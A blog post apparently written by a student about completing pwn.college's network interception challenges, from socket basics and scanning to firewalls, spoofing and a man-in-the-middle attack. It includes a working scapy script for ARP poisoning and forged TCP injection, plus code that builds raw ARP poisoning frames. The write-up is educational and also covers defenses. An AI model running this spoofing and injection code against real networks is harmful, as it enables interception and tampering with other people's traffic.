DEV Community

Hitanshu Gedam
Intercepting Communication on pwn.college's Intro to Cybersecurity Dojo

Introduction

I recently completed pwn.college's "Intercepting Communication" track inside the Intro to Cybersecurity dojo, a series of challenges that took me from the basics of socket programming to executing a full man-in-the-middle (MITM) attack. This post documents what I learned and how each challenge built upon the last.

Phase 1: The Basics of Network Communication

Connect, Send, Shutdown, Listen

These initial challenges taught me the fundamentals of socket programming:

  • Connect: Establishing TCP connections to remote hosts
  • Send: Transmitting data over established connections
  • Shutdown: Properly closing connections (half-closed vs. fully closed)
  • Listen: Creating a server that accepts incoming connections

The key insight was understanding the TCP state machine and how shutdown() differs from close(): shutdown(SHUT_WR) sends our FIN so the peer reads end-of-file, while our own read side stays open (a half-closed connection); close() just releases the file descriptor, and once the last reference to the socket is gone the whole connection is torn down.
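To make the half-close concrete, here is an added example (my own code, not from the challenge or the pwn.college material) using only Python's standard library: a throwaway server on 127.0.0.1 reads until it sees EOF and then answers with a byte count. The client that calls shutdown(SHUT_WR) still collects that answer; the client that calls close() cannot, because the descriptor is gone. The server, the port choice and the payload are all constructed for the demo.

```python
import socket
import threading


def _serve_one(srv):
    """Server side (constructed for the demo): read until the peer signals EOF,
    then answer with a byte count. EOF arrives whether the peer used shutdown() or close()."""
    conn, _ = srv.accept()
    srv.close()
    received = b""
    while chunk := conn.recv(4096):
        received += chunk
    try:
        conn.sendall(b"got %d bytes" % len(received))
    except OSError:
        pass  # peer already fully closed; its kernel answers our data with RST
    conn.close()


def _start_server():
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))  # port 0: the kernel picks a free port
    srv.listen(1)
    t = threading.Thread(target=_serve_one, args=(srv,), daemon=True)
    t.start()
    return srv.getsockname()[1], t


def _read_all(sock):
    data = b""
    while chunk := sock.recv(4096):
        data += chunk
    return data


def half_close_demo(payload=b"hello over tcp"):
    """shutdown(SHUT_WR) sends our FIN but keeps the read side open,
    so the server's reply can still be collected afterwards."""
    port, t = _start_server()
    cli = socket.create_connection(("127.0.0.1", port))
    cli.sendall(payload)
    cli.shutdown(socket.SHUT_WR)   # "no more data from me"; the connection is now half-closed
    reply = _read_all(cli)         # works: only our write side is closed
    cli.close()                    # now release the descriptor entirely
    t.join()
    return reply


def full_close_demo(payload=b"hello over tcp"):
    """close() releases the descriptor, so the reply can no longer be read."""
    port, t = _start_server()
    cli = socket.create_connection(("127.0.0.1", port))
    cli.sendall(payload)
    cli.close()
    try:
        reply = _read_all(cli)
    except OSError:
        reply = None               # EBADF: the socket no longer exists for this process
    t.join()
    return reply


if __name__ == "__main__":
    print(half_close_demo())   # b'got 14 bytes'
    print(full_close_demo())   # None
```

The server never distinguishes the two clients: from its side both send a FIN and both reads end with EOF. The difference is entirely local to the client, which is exactly why the Shutdown challenge is about the client's own state machine rather than the wire.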

Scan 1 & 2: Port Scanning

These challenges introduced me to network reconnaissance:

  • TCP Connect scanning vs. SYN scanning
  • Understanding service identification through banner grabbing
  • Handling timeouts and connection refusals

I learned that a SYN scan (nmap -sS) is faster and stealthier than a full TCP connect scan because it never completes the handshake. Two caveats: it needs raw-socket privileges (root), and the stealth is only relative, since the target's application never sees a connection and logs nothing, but the half-open probes are plainly visible to a packet-level monitor or IDS.
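Below is an added example of a TCP connect scanner with banner grabbing (my code, not a challenge solution, and nmap is not involved). It classifies each port from the kernel's point of view: a completed handshake is open, an immediate ECONNREFUSED means a RST came back (closed), and a timeout means something dropped the probe (filtered, which is what an iptables DROP rule looks like from outside). The demo target is a constructed local listener that greets with a made-up SSH banner, plus a port known to be free, so it runs offline.

```python
import socket
import threading


def scan_port(host, port, timeout=0.5):
    """TCP connect scan of a single port, with a banner grab on success.
    open: the handshake completed; closed: the host answered with RST (ECONNREFUSED);
    filtered: nothing came back before the timeout."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
    except ConnectionRefusedError:
        return "closed", b""
    except socket.timeout:
        return "filtered", b""
    except OSError as exc:          # e.g. EHOSTUNREACH: no route, not a port state
        return "error: %s" % exc.strerror, b""
    banner = b""
    try:
        banner = s.recv(256)        # SSH, SMTP, FTP and friends speak first
    except (socket.timeout, OSError):
        pass                        # silent service: open, but nothing to grab
    finally:
        s.close()
    return "open", banner


def scan_ports(host, ports, timeout=0.5):
    return {port: scan_port(host, port, timeout) for port in ports}


def _fake_service(banner):
    """Constructed local listener that greets with a banner (stands in for a real sshd)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        conn.sendall(banner)
        conn.close()
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def _unused_port():
    """Ask the kernel for a free port, then release it so a connect() there is refused."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port


def demo():
    open_port = _fake_service(b"SSH-2.0-OpenSSH_9.6 constructed-banner\r\n")
    closed_port = _unused_port()
    return scan_ports("127.0.0.1", [open_port, closed_port]), open_port, closed_port


if __name__ == "__main__":
    results, _, _ = demo()
    for port, (state, banner) in results.items():
        print(f"{port}/tcp {state} {banner.strip().decode(errors='replace')}")
```

Because connect() completes the handshake, every open port here shows up in the service's own logs, which is precisely the trace a SYN scan avoids. The timeout value matters: too short and a slow but open port is misreported as filtered.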

Monitor 1 & 2: Traffic Analysis

Using tcpdump and Wireshark, I learned to:

  • Capture packets with filters (host, port, tcp)
  • Analyze TCP flags (SYN, ACK, RST, FIN)
  • Identify suspicious patterns in network traffic

The tshark command became my best friend: tshark -r capture.pcap -Y "tcp.flags.syn == 1". One caveat: that filter matches SYN-ACK segments as well, so to see only the opening SYNs use -Y "tcp.flags.syn == 1 && tcp.flags.ack == 0".

Sniffing Cookies

This was my first taste of how dangerous unencrypted traffic can be. By sniffing HTTP traffic, I could extract session cookies and impersonate users. This drove home why HTTPS is essential for any authenticated session, and why session cookies should carry the Secure flag so a browser never sends them over plain HTTP.

Phase 2: Network Control

Network Configuration

Understanding IP addressing, subnet masks (/24, /16), routing tables, and default gateways. The ip command replaced the deprecated ifconfig in my toolkit.

Firewall 1, 2, 3

These challenges taught iptables:

  • Firewall 1: Basic filtering (ACCEPT/DROP rules)
  • Firewall 2: Stateful inspection (tracking established connections)
  • Firewall 3: NAT and port redirection

Key rules I learned:

# Firewall 1: allow inbound SSH; anything no rule matches falls through to the chain policy
iptables -A INPUT -p tcp --dport 22 -j ACCEPT
# Firewall 2: let replies to connections we initiated back in; rules match top-down, so this one usually goes first
# (-m state is the legacy match; -m conntrack --ctstate ESTABLISHED,RELATED is the modern spelling)
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
# Firewall 3: in the nat table, before routing, send inbound port 80 to a local listener on 8080
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080

Denial of Service 1, 2, 3

These challenges demonstrated various DoS attack vectors:

  1. SYN flood: Exhausting connection queues with incomplete handshakes
  2. UDP flood: Overwhelming bandwidth with stateless packets
  3. Application layer attacks: Slowloris-style attacks keeping connections open

Mitigation techniques included SYN cookies, rate limiting, and connection timeouts.

Phase 3: Protocol Deep Dive

Ethernet

Understanding MAC addresses, ARP, and the data link layer. The Ethernet frame structure (destination MAC, source MAC, EtherType, payload, FCS) became second nature.

IP

IPv4 header dissection: version, IHL, TOS (now DSCP/ECN), total length, identification, flags, fragment offset, TTL, protocol, header checksum (it covers only the header, not the payload), source/destination addresses. The TTL field's role in preventing routing loops was particularly interesting.

TCP

The Transmission Control Protocol's reliability mechanisms:

  • Sequence and acknowledgment numbers
  • Windowing and flow control
  • Retransmission and timeout handling

TCP Handshake

The three-way handshake (SYN, SYN-ACK, ACK) and four-way teardown (FIN, ACK, FIN, ACK). I learned to craft handshake packets using scapy and observe state transitions.
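The Monitor, Ethernet, IP and TCP Handshake sections above all come down to the same bytes. The following added example (my code, written for this post, independent of scapy and of the challenge files) builds the three handshake frames by hand with struct, including the IPv4 header checksum and the TCP pseudo-header checksum, dissects them back, and re-implements the tshark SYN filter in code to show that tcp.flags.syn == 1 also catches the SYN-ACK. All MAC addresses, IPs, ports and initial sequence numbers are constructed.

```python
import struct

ETH_P_IP = 0x0800
TCP_FLAGS = {0x01: "FIN", 0x02: "SYN", 0x04: "RST", 0x08: "PSH", 0x10: "ACK", 0x20: "URG"}


def mac(s):
    return bytes.fromhex(s.replace(":", ""))


def ip(s):
    return bytes(int(o) for o in s.split("."))


def fmt_mac(b):
    return ":".join("%02x" % x for x in b)


def fmt_ip(b):
    return ".".join(str(x) for x in b)


def checksum(data):
    """RFC 1071 one's-complement sum over 16-bit words (IPv4 header and TCP checksums).
    Verifying is the same computation: over a header with a valid checksum it returns 0."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def tcp_checksum(src_ip, dst_ip, segment):
    """TCP checksum covers a pseudo-header (addresses, zero, proto 6, length) plus the segment."""
    pseudo = ip(src_ip) + ip(dst_ip) + struct.pack("!BBH", 0, 6, len(segment))
    return checksum(pseudo + segment)


def build_frame(src_mac, dst_mac, src_ip, dst_ip, sport, dport, seq, ack, flags, payload=b"", ident=0x1234):
    """Ethernet II + IPv4 + TCP (no options), both checksums filled in."""
    # TCP: ports, seq, ack, data offset 5 words, flags, window, checksum placeholder, urgent pointer
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flags, 65535, 0, 0) + payload
    tcp = tcp[:16] + struct.pack("!H", tcp_checksum(src_ip, dst_ip, tcp)) + tcp[18:]
    # IPv4: version 4 / IHL 5, TOS, total length, id, DF flag, TTL 64, proto 6, checksum placeholder
    iph = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), ident, 0x4000, 64, 6, 0, ip(src_ip), ip(dst_ip))
    iph = iph[:10] + struct.pack("!H", checksum(iph)) + iph[12:]
    eth = mac(dst_mac) + mac(src_mac) + struct.pack("!H", ETH_P_IP)
    return eth + iph + tcp


def dissect(frame):
    """Parse a frame back into fields; raises ValueError on a bad checksum, returns None for non-TCP."""
    if struct.unpack("!H", frame[12:14])[0] != ETH_P_IP:
        return None
    ihl = (frame[14] & 0x0F) * 4
    iph = frame[14:14 + ihl]
    if checksum(iph) != 0:
        raise ValueError("bad IPv4 header checksum")
    if iph[9] != 6:
        return None
    src_ip, dst_ip = fmt_ip(iph[12:16]), fmt_ip(iph[16:20])
    total_len = struct.unpack("!H", iph[2:4])[0]
    tcp = frame[14 + ihl:14 + total_len]
    if tcp_checksum(src_ip, dst_ip, tcp) != 0:
        raise ValueError("bad TCP checksum")
    sport, dport, seq, ack, offs, flags = struct.unpack("!HHIIBB", tcp[:14])
    return {
        "src_mac": fmt_mac(frame[6:12]), "dst_mac": fmt_mac(frame[:6]),
        "src": src_ip, "dst": dst_ip, "ttl": iph[8],
        "sport": sport, "dport": dport, "seq": seq, "ack": ack,
        "flags": [name for bit, name in TCP_FLAGS.items() if flags & bit],
        "payload": tcp[(offs >> 4) * 4:],
    }


def handshake(cli_mac, srv_mac, cli_ip, srv_ip, cport, sport, isn_c, isn_s):
    """The three-way handshake as frames: SYN, SYN-ACK, ACK, with the seq/ack bookkeeping."""
    syn = build_frame(cli_mac, srv_mac, cli_ip, srv_ip, cport, sport, isn_c, 0, 0x02)
    synack = build_frame(srv_mac, cli_mac, srv_ip, cli_ip, sport, cport, isn_s, isn_c + 1, 0x12)
    ack = build_frame(cli_mac, srv_mac, cli_ip, srv_ip, cport, sport, isn_c + 1, isn_s + 1, 0x10)
    return [syn, synack, ack]


def filter_syn(frames, syn_only=False):
    """The tshark filter from the Monitor challenges, in code: 'tcp.flags.syn == 1' also
    matches SYN-ACK; syn_only adds the 'tcp.flags.ack == 0' condition."""
    out = []
    for frame in frames:
        d = dissect(frame)
        if d and "SYN" in d["flags"] and not (syn_only and "ACK" in d["flags"]):
            out.append(d)
    return out


# Constructed sample: client 10.0.0.1:40000 opening a connection to server 10.0.0.2:80
HANDSHAKE = handshake("02:00:00:00:00:01", "02:00:00:00:00:02",
                      "10.0.0.1", "10.0.0.2", 40000, 80, isn_c=1000, isn_s=5000)

if __name__ == "__main__":
    for d in (dissect(f) for f in HANDSHAKE):
        print(f"{d['src']}:{d['sport']} -> {d['dst']}:{d['dport']} {'/'.join(d['flags'])} seq={d['seq']} ack={d['ack']}")
    print(len(filter_syn(HANDSHAKE)), "match syn==1;", len(filter_syn(HANDSHAKE, syn_only=True)), "match syn==1 && ack==0")
```

Two details carry over directly to the later challenges: the SYN-ACK acknowledges isn_c + 1 and the final ACK carries seq isn_c + 1, which is the bookkeeping a forged segment has to get right, and the TCP checksum covers a pseudo-header with both IP addresses, so a spoofed source address silently invalidates a checksum computed before the address was changed.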

UDP

Connectionless, unreliable, but fast. UDP's simplicity makes it ideal for DNS, DHCP, and streaming. No handshake means lower latency but no delivery guarantees.

UDP Spoofing 1-4

These challenges escalated in complexity:

  1. Basic spoofing: Forging source IP addresses
  2. Response spoofing: Injecting fake replies
  3. Amplification attacks: Using UDP's stateless nature for reflection attacks (e.g., DNS amplification)
  4. Crafting accepted responses: UDP has no sequence numbers to predict, so a forged reply only has to match what the receiver expects at the addressing level (source/destination IP and port) plus whatever identifier the application adds, such as a DNS transaction ID; the work is in knowing exactly what the receiver checks

Phase 4: The Big Leagues

ARP

The Address Resolution Protocol maps IP addresses to MAC addresses. It has no authentication, and most stacks will update their cache from a reply they never asked for, which makes it trivial to spoof. I learned to send gratuitous ARP replies and how arp -a (or ip neigh on modern Linux) can reveal the ARP cache.
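As an added example (mine, not from the challenge), here is the poisoning frame in raw bytes and the reason it works: a simulated ARP cache with the classic behaviour accepts any reply it hears, so an unsolicited "is-at" that names the gateway's IP with the attacker's MAC replaces the real entry, while a cache with a static entry for the gateway does not. The detect_conflicts() helper is the defender's view of the same data: one IP claimed by two MACs inside a capture. All addresses are constructed for a toy 10.0.0.0/24 segment.

```python
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac(s):
    return bytes.fromhex(s.replace(":", ""))


def ip(s):
    return bytes(int(o) for o in s.split("."))


def fmt_mac(b):
    return ":".join("%02x" % x for x in b)


def fmt_ip(b):
    return ".".join(str(x) for x in b)


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II + ARP (Ethernet/IPv4). op=1 request (pass BROADCAST as target_mac; the
    target hardware field is ignored in requests), op=2 reply ('sender_ip is-at sender_mac').
    A reply nobody asked for, carrying someone else's IP as sender_ip, is the same poisoning
    frame scapy's ARP(op=2, psrc=...) produces."""
    eth = mac(target_mac) + mac(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, op,
                      mac(sender_mac), ip(sender_ip), mac(target_mac), ip(target_ip))
    return eth + arp


def parse_arp(frame):
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    _, _, _, _, op, smac, sip, tmac, tip = struct.unpack("!HHBBH6s4s6s4s", frame[14:42])
    return {"op": op, "sender_mac": fmt_mac(smac), "sender_ip": fmt_ip(sip),
            "target_mac": fmt_mac(tmac), "target_ip": fmt_ip(tip)}


class ArpCache:
    """Model of a host's ARP cache. The classic behaviour is stateless: any reply updates
    the table whether or not a request went out. Static entries (one of the mitigations
    in the takeaways below) are never overwritten by what arrives on the wire."""

    def __init__(self, static=None):
        self.static = dict(static or {})
        self.dynamic = {}

    def on_frame(self, frame):
        a = parse_arp(frame)
        if a is None or a["op"] != ARP_REPLY:
            return False
        if a["sender_ip"] in self.static:
            return False          # refuse to learn a MAC for a pinned IP
        self.dynamic[a["sender_ip"]] = a["sender_mac"]
        return True

    def lookup(self, ipaddr):
        return self.static.get(ipaddr) or self.dynamic.get(ipaddr)


def detect_conflicts(frames):
    """Monitor-side check: an IP announced by more than one MAC within a capture is
    the classic sign of ARP spoofing (or a misconfigured duplicate address)."""
    claims = {}
    for frame in frames:
        a = parse_arp(frame)
        if a and a["op"] == ARP_REPLY:
            claims.setdefault(a["sender_ip"], set()).add(a["sender_mac"])
    return {ipaddr: macs for ipaddr, macs in claims.items() if len(macs) > 1}


# Constructed lab: gateway, victim and attacker on 10.0.0.0/24
GATEWAY_IP, GATEWAY_MAC = "10.0.0.1", "02:00:00:00:00:01"
VICTIM_IP, VICTIM_MAC = "10.0.0.10", "02:00:00:00:00:10"
ATTACKER_MAC = "02:00:00:00:00:66"


def demo():
    legit = build_arp(ARP_REPLY, GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)
    poison = build_arp(ARP_REPLY, ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)  # attacker claims the gateway IP
    naive, pinned = ArpCache(), ArpCache(static={GATEWAY_IP: GATEWAY_MAC})
    for cache in (naive, pinned):
        cache.on_frame(legit)
        cache.on_frame(poison)
    return naive.lookup(GATEWAY_IP), pinned.lookup(GATEWAY_IP), detect_conflicts([legit, poison])


if __name__ == "__main__":
    naive_mac, pinned_mac, conflicts = demo()
    print("naive cache thinks the gateway is", naive_mac)
    print("pinned cache still has", pinned_mac)
    print("conflicting claims:", conflicts)
```

The frame is only 42 bytes and nothing in it proves who sent it; the victim's only defence is to stop trusting unsolicited replies, which is what a static entry (on the host) or Dynamic ARP Inspection (on the switch) does.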

Intercept

This challenge required passive interception - capturing traffic between two hosts without modifying it. Using tcpdump or scapy in promiscuous mode, I learned to sniff packets not destined for my MAC address. Promiscuous mode only lifts the NIC's own address filter, though: the frames still have to reach your interface, so on a switched segment they first have to be steered to you (a mirror port, or the ARP tricks above).

Man-in-the-Middle

The final boss. Here's what I executed:

from scapy.all import ARP, IP, TCP, Raw, send, sniff
import threading

# ARP spoofing to redirect traffic: tell the target that spoof_ip lives at our MAC
# (hwsrc defaults to the sending interface's MAC). target_ip, target_mac and spoof_ip
# are set for the challenge network. send(loop=1) blocks, so it runs in its own thread.
arp_spoof = ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
threading.Thread(target=send, args=(arp_spoof,), kwargs={"loop": 1, "inter": 2, "verbose": False}, daemon=True).start()

# Packet interception and modification
def process(pkt):
    if Raw in pkt and pkt[Raw].load == b"command: ":
        # Forge the client's answer "flag" (instead of "echo"): swap addresses and ports,
        # our seq is what the server expects next (its ack), and we ack the prompt bytes it just sent
        payload = b"flag"
        forged = (IP(src=pkt[IP].dst, dst=pkt[IP].src)
                  / TCP(sport=pkt[TCP].dport, dport=pkt[TCP].sport,
                        seq=pkt[TCP].ack, ack=pkt[TCP].seq + len(pkt[Raw].load), flags="PA")
                  / Raw(payload))
        send(forged, verbose=False)

sniff(filter=f"tcp and host {target_ip}", prn=process, store=False)

The breakthrough came when I realized I didn't need IP forwarding - with ARP spoofing and active packet injection, I could intercept and modify traffic directly.

Key Takeaways

  1. Network security is layered - vulnerabilities at any layer (ARP at L2, IP at L3, TCP/UDP at L4) can compromise higher layers.

  2. Trust is dangerous - ARP, UDP, and even TCP sequence numbers (in older implementations) rely on trust that can be abused.

  3. Encryption isn't optional - Many challenges (especially Sniffing Cookies) showed why plaintext protocols are unacceptable.

  4. Tools are powerful - scapy for packet crafting, tcpdump for capture, iptables for firewall rules, nmap for scanning.

  5. Defense requires depth - A single countermeasure isn't enough. ARP spoofing is mitigated by static ARP entries, DAI (Dynamic ARP Inspection on the switch), and network segmentation.

Final Thoughts

This track transformed how I see network traffic. Every packet tells a story - who's talking, what they're saying, and whether we can trust them. The MITM challenge pulled everything together: I had to understand ARP to redirect traffic, TCP to maintain sequence/ack numbers, packet crafting to forge responses, and protocol analysis to know when to inject.

For anyone learning network security, I can't recommend pwn.college enough. These challenges are well-designed, progressive, and brutally educational.


All challenges completed on pwn.college's platform. Thanks to the Arizona State University team for creating such an excellent learning resource.
